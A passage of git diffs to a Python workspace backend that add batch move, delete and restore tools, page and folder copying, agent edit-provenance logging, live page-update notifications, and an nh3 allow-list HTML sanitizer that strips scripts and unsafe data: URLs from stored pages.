+    "rename_page": _rename_page,
+    "delete_page": _delete_page,
+    "create_table": _create_table,
+    "insert_row": _insert_row,
+    "update_row": _update_row,
+    "add_column": _add_column,
+    "delete_row": _delete_row,
     "grep_pages": _grep_pages,
     "list_files": _list_files,
     "read_file": _read_file,

--- a/backend/services/agent_runtime.py
+++ b/backend/services/agent_runtime.py
@@ -1097,6 +1097,89 @@ async def _copy_folder(args: dict) -> dict:
     return _text_result(json.dumps({"id": str(folder["id"]), "name": folder["name"]}))
 
 
+_BATCH_ITEMS_SCHEMA = {
+    "type": "array",
+    "items": {
+        "type": "object",
+        "properties": {
+            "object_type": {
+                "type": "string",
+                "enum": ["page", "file", "folder", "table"],
+            },
+            "object_id": {"type": "string"},
+        },
+        "required": ["object_type", "object_id"],
+    },
+}
+
+
+@tool(
+    "batch_move",
+    "Move many items at once into a folder (or to the root with move_to_root). "
+    "Best-effort: returns which items moved and which failed. Items: pages, "
+    "files, folders, tables.",
+    {
+        "type": "object",
+        "properties": {
+            "items": _BATCH_ITEMS_SCHEMA,
+            "target_folder_id": {"type": "string"},
+            "move_to_root": {"type": "boolean", "default": False},
+        },
+        "required": ["items"],
+    },
+)
+async def _batch_move(args: dict) -> dict:
+    from . import batch_service
+
+    target = UUID(args["target_folder_id"]) if args.get("target_folder_id") else None
+    result = await batch_service.batch_move(
+        _current_workspace(),
+        _current_user(),
+        args.get("items") or [],
+        target_folder_id=target,
+        move_to_root=bool(args.get("move_to_root", False)),
+    )
+    return _text_result(json.dumps(result))
+
+
+@tool(
+    "batch_delete",
+    "Move many pages/files to the trash at once (soft delete). Best-effort: "
+    "returns which items were trashed and which failed.",
+    {
+        "type": "object",
+        "properties": {"items": _BATCH_ITEMS_SCHEMA},
+        "required": ["items"],
+    },
+)
+async def _batch_delete(args: dict) -> dict:
+    from . import batch_service
+
+    result = await batch_service.batch_delete(
+        _current_workspace(), _current_user(), args.get("items") or []
+    )
+    return _text_result(json.dumps(result))
+
+
+@tool(
+    "batch_restore",
+    "Restore many pages/files from the trash at once. Best-effort: returns "
+    "which items were restored and which failed.",
+    {
+        "type": "object",
+        "properties": {"items": _BATCH_ITEMS_SCHEMA},
+        "required": ["items"],
+    },
+)
+async def _batch_restore(args: dict) -> dict:
+    from . import batch_service
+
+    result = await batch_service.batch_restore(
+        _current_workspace(), _current_user(), args.get("items") or []
+    )
+    return _text_result(json.dumps(result))
+
+
 _TOOLS_BY_NAME = {
     "search_history": _search_history,
     "read_page": _read_page,
@@ -1114,6 +1197,9 @@ _TOOLS_BY_NAME = {
     "delete_row": _delete_row,
     "copy_page": _copy_page,
     "copy_folder": _copy_folder,
+    "batch_move": _batch_move,
+    "batch_delete": _batch_delete,
+    "batch_restore": _batch_restore,
     "grep_pages": _grep_pages,
     "list_files": _list_files,
     "read_file": _read_file,

--- a/backend/services/agent_runtime.py
+++ b/backend/services/agent_runtime.py
@@ -1022,6 +1022,59 @@ async def _delete_row(args: dict) -> dict:
     return _text_result(json.dumps({"deleted": True, "row_id": args["row_id"]}))
 
 
+@tool(
+    "copy_page",
+    "Duplicate a page as 'Copy of <name>'. Pass target_folder_id to place the "
+    "copy in a specific folder (defaults to the source's folder).",
+    {
+        "type": "object",
+        "properties": {
+            "page_id": {"type": "string"},
+            "target_folder_id": {"type": "string"},
+        },
+        "required": ["page_id"],
+    },
+)
+async def _copy_page(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    target = UUID(args["target_folder_id"]) if args.get("target_folder_id") else None
+    page = await files_tree_service.copy_page(
+        UUID(args["page_id"]), workspace_id, user_id, target_folder_id=target
+    )
+    if page is None:
+        return _text_result(json.dumps({"error": "page not found"}))
+    return _text_result(json.dumps({"id": str(page["id"]), "name": page["name"]}))
+
+
+@tool(
+    "copy_folder",
+    "Deep-duplicate a folder (its subfolders, pages, and tables) as "
+    "'Copy of <name>'. Pass target_parent_id to nest the copy under another folder.",
+    {
+        "type": "object",
+        "properties": {
+            "folder_id": {"type": "string"},
+            "target_parent_id": {"type": "string"},
+        },
+        "required": ["folder_id"],
+    },
+)
+async def _copy_folder(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    target = UUID(args["target_parent_id"]) if args.get("target_parent_id") else None
+    try:
+        folder = await files_tree_service.copy_folder(
+            UUID(args["folder_id"]), workspace_id, user_id, target_parent_id=target
+        )
+    except files_tree_service.FolderCycle as e:
+        return _text_result(json.dumps({"error": str(e)}))
+    if folder is None:
+        return _text_result(json.dumps({"error": "folder not found"}))
+    return _text_result(json.dumps({"id": str(folder["id"]), "name": folder["name"]}))
+
+
 _TOOLS_BY_NAME = {
     "search_history": _search_history,
     "read_page": _read_page,
@@ -1037,6 +1090,8 @@ _TOOLS_BY_NAME = {
     "update_row": _update_row,
     "add_column": _add_column,
     "delete_row": _delete_row,
+    "copy_page": _copy_page,
+    "copy_folder": _copy_folder,
     "grep_pages": _grep_pages,
     "list_files": _list_files,
     "read_file": _read_file,

--- a/backend/services/agent_runtime.py
+++ b/backend/services/agent_runtime.py
@@ -50,6 +50,22 @@ _workspace_ctx: contextvars.ContextVar[UUID | None] = contextvars.ContextVar(
 _user_ctx: contextvars.ContextVar[UUID | None] = contextvars.ContextVar(
     "stash_user_id", default=None
 )
+# Best-effort edit provenance: which agent / session a tool call belongs to.
+# Unset for surfaces that don't run inside a session (e.g. one-shot ask).
+_session_ctx: contextvars.ContextVar[str | None] = contextvars.ContextVar(
+    "stash_session_id", default=None
+)
+_agent_name_ctx: contextvars.ContextVar[str | None] = contextvars.ContextVar(
+    "stash_agent_name", default=None
+)
+
+
+def _current_session() -> str | None:
+    return _session_ctx.get()
+
+
+def _current_agent_name() -> str | None:
+    return _agent_name_ctx.get()
 
 
 def _current_workspace() -> UUID:
@@ -695,6 +711,8 @@ async def _create_page(args: dict) -> dict:
             content=args.get("content") or "",
             content_type=args.get("content_type") or "markdown",
             content_html=args.get("content_html") or "",
+            edit_session_id=_current_session(),
+            edit_agent_name=_current_agent_name(),
         )
     except files_tree_service.DuplicatePageName:
         return _text_result(json.dumps({"error": "a page with that name already exists here"}))
@@ -730,6 +748,8 @@ async def _update_page(args: dict) -> dict:
         content=args.get("content"),
         content_type=args.get("content_type"),
         content_html=args.get("content_html"),
+        edit_session_id=_current_session(),
+        edit_agent_name=_current_agent_name(),
     )
     if page is None:
         return _text_result(json.dumps({"error": "page not found"}))
@@ -764,6 +784,8 @@ async def _edit_page(args: dict) -> dict:
             old_string=args.get("old_string") or "",
             new_string=args["new_string"],
             mode=args.get("mode") or "replace",
+            edit_session_id=_current_session(),
+            edit_agent_name=_current_agent_name(),
         )
     except files_tree_service.EditMatchError as e:
         return _text_result(

--- a/backend/services/ask_service.py
+++ b/backend/services/ask_service.py
@@ -106,7 +106,7 @@ async def stream_chat(
         history=history,
         workspace_id=workspace_id,
         user_id=user_id,
-        tool_set=prompts.ASK_TOOL_SET,
+        tool_set=prompts.STASH_TOOL_SET,
     ):
         if event.get("type") == "text":
             answer.append(event.get("delta") or "")

--- a/backend/services/ask_service.py
+++ b/backend/services/ask_service.py
@@ -107,6 +107,8 @@ async def stream_chat(
         workspace_id=workspace_id,
         user_id=user_id,
         tool_set=prompts.STASH_TOOL_SET,
+        session_id=session_id,
+        agent_name=AGENT_NAME,
     ):
         if event.get("type") == "text":
             answer.append(event.get("delta") or "")
@@ -161,6 +163,8 @@ async def run_chat(
         workspace_id=workspace_id,
         user_id=user_id,
         tool_set=prompts.SLACK_TOOL_SET,
+        session_id=session_id,
+        agent_name=AGENT_NAME,
     ):
         if event.get("type") == "text":
             answer.append(event.get("delta") or "")

--- a/backend/services/batch_service.py
+++ b/backend/services/batch_service.py
@@ -1,0 +1,153 @@
+"""Batch move / soft-delete / restore over many tree items.
+
+Best-effort: each item is processed independently and we return per-item
+results, so one failure (no write access, wrong workspace) never blocks the
+rest. Composes the existing per-item service functions — no new persistence.
+
+move covers pages, files, folders, and tables; delete/restore cover the
+soft-deletable types (pages, files) — folders and tables hard-delete, which we
+deliberately keep out of a best-effort loop.
+"""
+
+from __future__ import annotations
+
+from uuid import UUID
+
+from ..database import get_pool
+from . import files_service, files_tree_service, permission_service, table_service
+
+_MOVABLE = {"page", "file", "folder", "table"}
+_TRASHABLE = {"page", "file"}
+
+
+async def _authorize(object_type: str, object_id: UUID, workspace_id: UUID, user_id: UUID) -> None:
+    """Raise ValueError unless the object lives in this workspace and the user
+    may write it. Resolving the real workspace closes the cross-workspace hole
+    where membership in the request's workspace would otherwise pass."""
+    obj_ws = await permission_service.resolve_workspace_id(object_type, object_id)
+    if obj_ws != workspace_id:
+        raise ValueError("not found")
+    if not await permission_service.check_access(
+        object_type, object_id, user_id, workspace_id=workspace_id, require="write"
+    ):
+        raise ValueError("no write access")
+
+
+async def _move_one(
+    object_type: str,
+    object_id: UUID,
+    workspace_id: UUID,
+    user_id: UUID,
+    target_folder_id: UUID | None,
+    move_to_root: bool,
+) -> bool:
+    if object_type == "page":
+        page = await files_tree_service.update_page(
+            object_id, workspace_id, user_id, folder_id=target_folder_id, move_to_root=move_to_root
+        )
+        return page is not None
+    if object_type == "folder":
+        folder = await files_tree_service.update_folder(
+            object_id, workspace_id, parent_folder_id=target_folder_id, move_to_root=move_to_root
+        )
+        return folder is not None
+    if object_type == "table":
+        table = await table_service.update_table(
+            object_id, user_id, folder_id=target_folder_id, move_to_root=move_to_root
+        )
+        return table is not None
+    if object_type == "file":
+        pool = get_pool()
+        if move_to_root:
+            res = await pool.execute(
+                "UPDATE files SET folder_id = NULL "
+                "WHERE id = $1 AND workspace_id = $2 AND deleted_at IS NULL",
+                object_id,
+                workspace_id,
+            )
+        else:
+            res = await pool.execute(
+                "UPDATE files SET folder_id = $3 "
+                "WHERE id = $1 AND workspace_id = $2 AND deleted_at IS NULL",
+                object_id,
+                workspace_id,
+                target_folder_id,
+            )
+        return res.endswith("1")
+    raise ValueError(f"can't move a {object_type}")
+
+
+async def _delete_one(object_type: str, object_id: UUID, workspace_id: UUID, user_id: UUID) -> bool:
+    if object_type == "page":
+        return await files_tree_service.delete_page(object_id, workspace_id, user_id)
+    if object_type == "file":
+        return await files_service.delete_file(object_id, workspace_id, user_id)
+    raise ValueError(f"batch delete supports pages and files, not {object_type}")
+
+
+async def _restore_one(object_type: str, object_id: UUID, workspace_id: UUID) -> bool:
+    if object_type == "page":
+        return await files_tree_service.restore_page(object_id, workspace_id)
+    if object_type == "file":
+        return await files_service.restore_file(object_id, workspace_id)
+    raise ValueError(f"batch restore supports pages and files, not {object_type}")
+
+
+async def _run(items: list[dict], handler) -> dict:
+    """Apply `handler(object_type, object_id)` to each item, collecting per-item
+    success/failure. Never raises for an individual item."""
+    succeeded: list[dict] = []
+    errors: list[dict] = []
+    for item in items:
+        ref = {"object_type": item.get("object_type"), "object_id": item.get("object_id")}
+        try:
+            object_id = UUID(str(item["object_id"]))
+            ok = await handler(item["object_type"], object_id)
+            if ok:
+                succeeded.append(ref)
+            else:
+                errors.append({**ref, "reason": "not found"})
+        except (ValueError, KeyError) as e:
+            errors.append({**ref, "reason": str(e) or "invalid item"})
+    return {"succeeded": succeeded, "errors": errors}
+
+
+async def batch_move(
+    workspace_id: UUID,
+    user_id: UUID,
+    items: list[dict],
+    target_folder_id: UUID | None = None,
+    move_to_root: bool = False,
+) -> dict:
+    async def handler(object_type: str, object_id: UUID) -> bool:
+        if object_type not in _MOVABLE:
+            raise ValueError(f"can't move a {object_type}")
+        await _authorize(object_type, object_id, workspace_id, user_id)
+        return await _move_one(
+            object_type, object_id, workspace_id, user_id, target_folder_id, move_to_root
+        )
+
+    return await _run(items, handler)
+
+
+async def batch_delete(workspace_id: UUID, user_id: UUID, items: list[dict]) -> dict:
+    async def handler(object_type: str, object_id: UUID) -> bool:
+        if object_type not in _TRASHABLE:
+            raise ValueError(f"batch delete supports pages and files, not {object_type}")
+        await _authorize(object_type, object_id, workspace_id, user_id)
+        return await _delete_one(object_type, object_id, workspace_id, user_id)
+
+    return await _run(items, handler)
+
+
+async def batch_restore(workspace_id: UUID, user_id: UUID, items: list[dict]) -> dict:
+    async def handler(object_type: str, object_id: UUID) -> bool:
+        if object_type not in _TRASHABLE:
+            raise ValueError(f"batch restore supports pages and files, not {object_type}")
+        # Trashed rows can't be permission-checked the normal way (live-only
+        # queries skip them); workspace membership + write is the gate.
+        if not await permission_service.is_workspace_member(workspace_id, user_id):
+            raise ValueError("no write access")
+        return await _restore_one(object_type, object_id, workspace_id)
+
+    return await _run(items, handler)

--- a/backend/services/files_tree_service.py
+++ b/backend/services/files_tree_service.py
@@ -12,11 +12,59 @@ from collections.abc import Awaitable, Callable
 from uuid import UUID
 
 import asyncpg
+import nh3
 
 from ..database import get_pool
 from . import permission_service
 
 logger = logging.getLogger(__name__)
+
+# HTML pages render in a sandboxed iframe with allow-scripts, and are served on
+# public cartridge URLs. We strip author-supplied scripts / event handlers /
+# javascript: + data:text/html URLs on write so an agent- or attacker-authored
+# page can't run hostile JS for a public viewer. The trusted resize/slide
+# bootstrap is injected at render time (not stored), so this never touches it.
+_SANITIZE_TAGS = nh3.ALLOWED_TAGS | {
+    "section", "style", "div", "span", "header", "footer", "main", "article",
+    "aside", "nav", "figure", "figcaption", "video", "audio", "source",
+    "picture", "details", "summary", "mark",
+    "svg", "path", "g", "circle", "rect", "line", "polyline", "polygon", "text",
+}
+_SANITIZE_ATTRS = {
+    "*": {"class", "id", "style", "title", "lang", "dir", "role", "width", "height"},
+    "span": {"data-comment-id"},  # inline comment anchors depend on this
+    "img": {"src", "alt", "loading", "srcset"},
+    "a": {"href", "target", "name"},
+    "video": {"src", "controls", "poster", "autoplay", "loop", "muted"},
+    "audio": {"src", "controls"},
+    "source": {"src", "srcset", "type", "media"},
+    "td": {"colspan", "rowspan"},
+    "th": {"colspan", "rowspan", "scope"},
+    "section": {"data-slide"},
+}
+_SANITIZE_URL_SCHEMES = {"http", "https", "mailto", "tel", "data"}
+
+
+def _drop_unsafe_data_uri(tag: str, attr: str, value: str) -> str | None:
+    """data: URLs are useful for inline images but a phishing/exfil vector
+    elsewhere (e.g. <a href="data:text/html,…">). Keep them only on <img src>."""
+    if value.strip().lower().startswith("data:") and not (tag == "img" and attr == "src"):
+        return None
+    return value
+
+
+def _sanitize_html(html: str) -> str:
+    if not html:
+        return html
+    return nh3.clean(
+        html,
+        tags=_SANITIZE_TAGS,
+        attributes=_SANITIZE_ATTRS,
+        url_schemes=_SANITIZE_URL_SCHEMES,
+        link_rel=None,
+        clean_content_tags={"script"},
+        attribute_filter=_drop_unsafe_data_uri,
+    )
 
 # Workspace-owned page (excludes the read-only stash mirror rows).
 _OWNED_PAGE_PRED = "COALESCE(metadata->>'shared_in_cartridge_id', '') = ''"
@@ -258,6 +306,7 @@ async def create_page(
         folder = await pool.fetchrow("SELECT workspace_id FROM folders WHERE id = $1", folder_id)
         if not folder or folder["workspace_id"] != workspace_id:
             raise ValueError("folder_id does not belong to workspace")
+    content_html = _sanitize_html(content_html)
     active = _active_content(content_type, content, content_html)
     ch = _content_hash(active)
     meta = metadata or {}
@@ -350,6 +399,8 @@ async def update_page(
 ) -> dict | None:
     """Update a page with optimistic concurrency on content_hash."""
     pool = get_pool()
+    if content_html is not None:
+        content_html = _sanitize_html(content_html)
     content_changed = content is not None or content_type is not None or content_html is not None
 
     if folder_id is not None and not move_to_root:
@@ -484,6 +535,61 @@ async def update_page(
     if fresh is None:
         return None
     raise ConcurrentEditError(dict(fresh))
+
+
+class EditMatchError(Exception):
+    """`old_string` did not match exactly once in the page body."""
+
+    def __init__(self, count: int):
+        self.count = count
+        super().__init__(f"old_string matched {count} times; it must match exactly once")
+
+
+def _apply_edit(text: str, old_string: str, new_string: str, mode: str) -> str:
+    if mode == "append":
+        return text + new_string
+    count = text.count(old_string)
+    if count != 1:
+        raise EditMatchError(count)
+    return text.replace(old_string, new_string)
+
+
+async def edit_page(
+    page_id: UUID,
+    workspace_id: UUID,
+    updated_by: UUID,
+    *,
+    old_string: str,
+    new_string: str,
+    mode: str = "replace",
+) -> dict | None:
+    """Surgical edit of a page body: replace a unique `old_string`, or append.
+
+    Operates on the active content field (markdown or html). `replace` mode
+    fails loud — no fuzzy matching — when `old_string` matches zero or many
+    times, writing nothing. Concurrent edits that leave the anchor intact are
+    re-applied to the fresh body and retried; if a collaborator removes or
+    duplicates the anchor, the retry raises EditMatchError rather than guessing.
+    """
+    for _ in range(MAX_UPDATE_RETRIES):
+        page = await get_page(page_id, workspace_id)
+        if page is None:
+            return None
+        is_html = page["content_type"] == "html"
+        field = (page["content_html"] if is_html else page["content_markdown"]) or ""
+        new_text = _apply_edit(field, old_string, new_string, mode)
+        edited = {"content_html": new_text} if is_html else {"content": new_text}
+        try:
+            result = await update_page(
+                page_id=page_id,
+                workspace_id=workspace_id,
+                updated_by=updated_by,
+                **edited,
+            )
+        except ConcurrentEditError:
+            continue
+        return result
+    raise ConcurrentEditError(page)
 
 
 async def delete_page(page_id: UUID, workspace_id: UUID, deleted_by: UUID) -> bool:

--- a/backend/services/files_tree_service.py
+++ b/backend/services/files_tree_service.py
@@ -25,10 +25,34 @@ logger = logging.getLogger(__name__)
 # page can't run hostile JS for a public viewer. The trusted resize/slide
 # bootstrap is injected at render time (not stored), so this never touches it.
 _SANITIZE_TAGS = nh3.ALLOWED_TAGS | {
-    "section", "style", "div", "span", "header", "footer", "main", "article",
-    "aside", "nav", "figure", "figcaption", "video", "audio", "source",
-    "picture", "details", "summary", "mark",
-    "svg", "path", "g", "circle", "rect", "line", "polyline", "polygon", "text",
+    "section",
+    "style",
+    "div",
+    "span",
+    "header",
+    "footer",
+    "main",
+    "article",
+    "aside",
+    "nav",
+    "figure",
+    "figcaption",
+    "video",
+    "audio",
+    "source",
+    "picture",
+    "details",
+    "summary",
+    "mark",
+    "svg",
+    "path",
+    "g",
+    "circle",
+    "rect",
+    "line",
+    "polyline",
+    "polygon",
+    "text",
 }
 _SANITIZE_ATTRS = {
     "*": {"class", "id", "style", "title", "lang", "dir", "role", "width", "height"},
@@ -65,6 +89,7 @@ def _sanitize_html(html: str) -> str:
         clean_content_tags={"script"},
         attribute_filter=_drop_unsafe_data_uri,
     )
+
 
 # Workspace-owned page (excludes the read-only stash mirror rows).
 _OWNED_PAGE_PRED = "COALESCE(metadata->>'shared_in_cartridge_id', '') = ''"
@@ -728,9 +753,7 @@ async def _create_page_unique(
     n = 2
     while True:
         try:
-            return await create_page(
-                workspace_id, name, created_by, folder_id=folder_id, **content
-            )
+            return await create_page(workspace_id, name, created_by, folder_id=folder_id, **content)
         except DuplicatePageName:
             name = f"{base_name} ({n})"
             n += 1
@@ -837,9 +860,7 @@ async def _copy_table_into(
         "SELECT data FROM table_rows WHERE table_id = $1 ORDER BY row_order", table_id
     )
     if rows:
-        await table_service.create_rows_batch(
-            new_table["id"], [r["data"] for r in rows], copied_by
-        )
+        await table_service.create_rows_batch(new_table["id"], [r["data"] for r in rows], copied_by)
     return new_table
 
 
@@ -856,7 +877,10 @@ async def _copy_folder_contents(
         src = await get_page(p["id"], workspace_id)
         if src:
             await create_page(
-                workspace_id, src["name"], copied_by, folder_id=dst_folder_id,
+                workspace_id,
+                src["name"],
+                copied_by,
+                folder_id=dst_folder_id,
                 **_page_content_kwargs(src),
             )
 
@@ -882,7 +906,9 @@ async def _copy_folder_contents(
         src_folder_id,
     )
     for s in sub_rows:
-        child = await create_folder(workspace_id, s["name"], copied_by, parent_folder_id=dst_folder_id)
+        child = await create_folder(
+            workspace_id, s["name"], copied_by, parent_folder_id=dst_folder_id
+        )
         await _copy_folder_contents(s["id"], child["id"], workspace_id, copied_by)
 
 

--- a/backend/services/files_tree_service.py
+++ b/backend/services/files_tree_service.py
@@ -290,6 +290,27 @@ async def _assert_no_cycle(folder_id: UUID, new_parent_id: UUID | None) -> None:
 # --- Page CRUD ---
 
 
+async def _log_page_edit(
+    page_id: UUID,
+    workspace_id: UUID,
+    edited_by: UUID,
+    agent_name: str | None,
+    session_id: str | None,
+    op: str,
+) -> None:
+    await get_pool().execute(
+        "INSERT INTO page_edits "
+        "(page_id, workspace_id, edited_by, agent_name, session_id, op) "
+        "VALUES ($1, $2, $3, $4, $5, $6)",
+        page_id,
+        workspace_id,
+        edited_by,
+        agent_name,
+        session_id,
+        op,
+    )
+
+
 async def create_page(
     workspace_id: UUID,
     name: str,
@@ -300,6 +321,8 @@ async def create_page(
     content_type: str = "markdown",
     content_html: str = "",
     html_layout: str = "responsive",
+    edit_session_id: str | None = None,
+    edit_agent_name: str | None = None,
 ) -> dict:
     pool = get_pool()
     if folder_id is not None:
@@ -314,11 +337,12 @@ async def create_page(
         row = await pool.fetchrow(
             "INSERT INTO pages "
             "(workspace_id, folder_id, name, content_markdown, content_html, content_type, "
-            "html_layout, content_hash, metadata, created_by, updated_by) "
-            "VALUES ($1, $2, $3, $4, $5, $6, $7, $8, $9::jsonb, $10, $10) "
+            "html_layout, content_hash, metadata, created_by, updated_by, "
+            "last_edit_session_id, last_edit_agent_name) "
+            "VALUES ($1, $2, $3, $4, $5, $6, $7, $8, $9::jsonb, $10, $10, $11, $12) "
             "RETURNING id, workspace_id, folder_id, name, content_markdown, content_html, "
             "content_type, html_layout, content_hash, metadata, created_by, updated_by, "
-            "created_at, updated_at",
+            "last_edit_session_id, last_edit_agent_name, created_at, updated_at",
             workspace_id,
             folder_id,
             name,
@@ -329,10 +353,15 @@ async def create_page(
             ch,
             meta,
             created_by,
+            edit_session_id,
+            edit_agent_name,
         )
     except asyncpg.UniqueViolationError as e:
         raise DuplicatePageName(workspace_id, folder_id, name) from e
     page = dict(row)
+    await _log_page_edit(
+        page["id"], workspace_id, created_by, edit_agent_name, edit_session_id, "create"
+    )
     if active:
         _schedule_embed(page["id"], active)
     return page
@@ -347,6 +376,7 @@ async def get_page(
     row = await pool.fetchrow(
         "SELECT id, workspace_id, folder_id, name, content_markdown, content_html, "
         "content_type, html_layout, content_hash, metadata, "
+        "last_edit_session_id, last_edit_agent_name, "
         "created_by, updated_by, created_at, updated_at "
         f"FROM pages WHERE id = $1 AND workspace_id = $2 AND {_WORKSPACE_PAGE_FILTER}",
         page_id,
@@ -396,6 +426,9 @@ async def update_page(
     metadata: dict | None = None,
     guard_content_hash: bool = True,
     on_conflict: Callable[[dict], Awaitable[str]] | None = None,
+    edit_session_id: str | None = None,
+    edit_agent_name: str | None = None,
+    edit_op: str = "update",
 ) -> dict | None:
     """Update a page with optimistic concurrency on content_hash."""
     pool = get_pool()
@@ -467,6 +500,12 @@ async def update_page(
             sets.append(f"content_hash = ${idx}")
             args.append(_content_hash(new_active))
             idx += 1
+            sets.append(f"last_edit_session_id = ${idx}")
+            args.append(edit_session_id)
+            idx += 1
+            sets.append(f"last_edit_agent_name = ${idx}")
+            args.append(edit_agent_name)
+            idx += 1
         if metadata is not None:
             sets.append(f"metadata = ${idx}::jsonb")
             args.append(metadata)
@@ -484,6 +523,7 @@ async def update_page(
                 f"UPDATE pages SET {', '.join(sets)} WHERE {where} "
                 "RETURNING id, workspace_id, folder_id, name, content_markdown, content_html, "
                 "content_type, html_layout, content_hash, metadata, "
+                "last_edit_session_id, last_edit_agent_name, "
                 "created_by, updated_by, created_at, updated_at",
                 *args,
             )
@@ -491,11 +531,15 @@ async def update_page(
             raise DuplicatePageName(workspace_id, folder_id, name or "") from e
         if row:
             page = dict(row)
-            if content_changed and page["content_hash"] != expected_hash:
-                active = _active_content(
-                    page["content_type"], page["content_markdown"], page["content_html"]
+            if content_changed:
+                await _log_page_edit(
+                    page["id"], workspace_id, updated_by, edit_agent_name, edit_session_id, edit_op
                 )
-                _schedule_embed(page["id"], active)
+                if page["content_hash"] != expected_hash:
+                    active = _active_content(
+                        page["content_type"], page["content_markdown"], page["content_html"]
+                    )
+                    _schedule_embed(page["id"], active)
             return page
 
         if expected_hash is None or not guard_content_hash:
@@ -562,6 +606,8 @@ async def edit_page(
     old_string: str,
     new_string: str,
     mode: str = "replace",
+    edit_session_id: str | None = None,
+    edit_agent_name: str | None = None,
 ) -> dict | None:
     """Surgical edit of a page body: replace a unique `old_string`, or append.
 
@@ -584,6 +630,9 @@ async def edit_page(
                 page_id=page_id,
                 workspace_id=workspace_id,
                 updated_by=updated_by,
+                edit_session_id=edit_session_id,
+                edit_agent_name=edit_agent_name,
+                edit_op="edit",
                 **edited,
             )
         except ConcurrentEditError:

--- a/backend/services/files_tree_service.py
+++ b/backend/services/files_tree_service.py
@@ -15,7 +15,7 @@ import asyncpg
 import nh3
 
 from ..database import get_pool
-from . import permission_service
+from . import page_events, permission_service
 
 logger = logging.getLogger(__name__)
 
@@ -429,8 +429,14 @@ async def update_page(
     edit_session_id: str | None = None,
     edit_agent_name: str | None = None,
     edit_op: str = "update",
+    notify: bool = True,
 ) -> dict | None:
-    """Update a page with optimistic concurrency on content_hash."""
+    """Update a page with optimistic concurrency on content_hash.
+
+    When `notify` (the default for agent/REST writes, but False for the live
+    editor's own Yjs->DB projection), a content change broadcasts a page-update
+    event to open viewers and invalidates any persisted collab doc so a reopened
+    editor reloads the fresh content instead of stale Yjs state."""
     pool = get_pool()
     if content_html is not None:
         content_html = _sanitize_html(content_html)
@@ -540,6 +546,13 @@ async def update_page(
                         page["content_type"], page["content_markdown"], page["content_html"]
                     )
                     _schedule_embed(page["id"], active)
+                if notify:
+                    # An external (non-editor) write: drop stale collab state so a
+                    # reopened editor reloads fresh, and tell open viewers.
+                    await delete_page_collab_state(page["id"], workspace_id)
+                    page_events.publish_page_update(
+                        workspace_id, page["id"], page["content_hash"], edit_agent_name
+                    )
             return page
 
         if expected_hash is None or not guard_content_hash:

--- a/backend/services/files_tree_service.py
+++ b/backend/services/files_tree_service.py
@@ -651,6 +651,201 @@ async def list_trashed_pages(workspace_id: UUID) -> list[dict]:
     return [dict(r) for r in rows]
 
 
+# --- Copy / duplicate ---
+#
+# A duplicate is just a fresh create from a source's content, so copies inherit
+# uniqueness, sanitization, and embedding for free. The top-level object copied
+# directly gets a "Copy of …" name; descendants of a copied folder keep their
+# names (the new folder is empty, so they can't collide).
+
+
+async def _create_page_unique(
+    workspace_id: UUID, base_name: str, created_by: UUID, folder_id: UUID | None, **content
+) -> dict:
+    name = base_name
+    n = 2
+    while True:
+        try:
+            return await create_page(
+                workspace_id, name, created_by, folder_id=folder_id, **content
+            )
+        except DuplicatePageName:
+            name = f"{base_name} ({n})"
+            n += 1
+
+
+async def _create_folder_unique(
+    workspace_id: UUID, base_name: str, created_by: UUID, parent_folder_id: UUID | None
+) -> dict:
+    name = base_name
+    n = 2
+    while True:
+        try:
+            return await create_folder(
+                workspace_id, name, created_by, parent_folder_id=parent_folder_id
+            )
+        except DuplicateFolderName:
+            name = f"{base_name} ({n})"
+            n += 1
+
+
+def _page_content_kwargs(src: dict) -> dict:
+    return {
+        "content": src["content_markdown"] or "",
+        "content_type": src["content_type"],
+        "content_html": src["content_html"] or "",
+        "html_layout": src["html_layout"],
+        "metadata": src["metadata"],
+    }
+
+
+async def copy_page(
+    page_id: UUID,
+    workspace_id: UUID,
+    copied_by: UUID,
+    target_folder_id: UUID | None = None,
+) -> dict | None:
+    """Duplicate a page as 'Copy of <name>'. Lands in the source's folder unless
+    target_folder_id is given."""
+    src = await get_page(page_id, workspace_id)
+    if src is None:
+        return None
+    folder_id = target_folder_id if target_folder_id is not None else src["folder_id"]
+    return await _create_page_unique(
+        workspace_id, f"Copy of {src['name']}", copied_by, folder_id, **_page_content_kwargs(src)
+    )
+
+
+async def copy_file(
+    file_id: UUID,
+    workspace_id: UUID,
+    copied_by: UUID,
+    target_folder_id: UUID | None = None,
+    name: str | None = None,
+) -> dict | None:
+    """Duplicate an uploaded file, copying its S3 blob to a fresh key. Files have
+    no name-uniqueness constraint, so the name is used as-is."""
+    from . import storage_service
+
+    pool = get_pool()
+    src = await pool.fetchrow(
+        "SELECT name, content_type, storage_key, folder_id, extracted_text, extraction_status "
+        "FROM files WHERE id = $1 AND workspace_id = $2 AND deleted_at IS NULL",
+        file_id,
+        workspace_id,
+    )
+    if not src:
+        return None
+    data = await storage_service.download_file(src["storage_key"])
+    new_name = name or f"Copy of {src['name']}"
+    new_key = await storage_service.upload_file(
+        str(workspace_id), new_name, data, src["content_type"]
+    )
+    folder_id = target_folder_id if target_folder_id is not None else src["folder_id"]
+    row = await pool.fetchrow(
+        "INSERT INTO files (workspace_id, name, content_type, size_bytes, storage_key, "
+        "uploaded_by, folder_id, extracted_text, extraction_status) "
+        "VALUES ($1, $2, $3, $4, $5, $6, $7, $8, $9) RETURNING id, name",
+        workspace_id,
+        new_name,
+        src["content_type"],
+        len(data),
+        new_key,
+        copied_by,
+        folder_id,
+        src["extracted_text"],
+        src["extraction_status"],
+    )
+    return dict(row)
+
+
+async def _copy_table_into(
+    table_id: UUID, workspace_id: UUID, copied_by: UUID, folder_id: UUID | None, name: str
+) -> dict:
+    """Clone a table's schema + rows into folder_id under `name`. Column ids are
+    preserved by create_table, so existing row payloads stay valid."""
+    from . import table_service
+
+    meta = await table_service.get_table_metadata(table_id)
+    new_table = await table_service.create_table(
+        workspace_id, name, meta["description"], meta["columns"], copied_by, folder_id=folder_id
+    )
+    pool = get_pool()
+    rows = await pool.fetch(
+        "SELECT data FROM table_rows WHERE table_id = $1 ORDER BY row_order", table_id
+    )
+    if rows:
+        await table_service.create_rows_batch(
+            new_table["id"], [r["data"] for r in rows], copied_by
+        )
+    return new_table
+
+
+async def _copy_folder_contents(
+    src_folder_id: UUID, dst_folder_id: UUID, workspace_id: UUID, copied_by: UUID
+) -> None:
+    pool = get_pool()
+    page_rows = await pool.fetch(
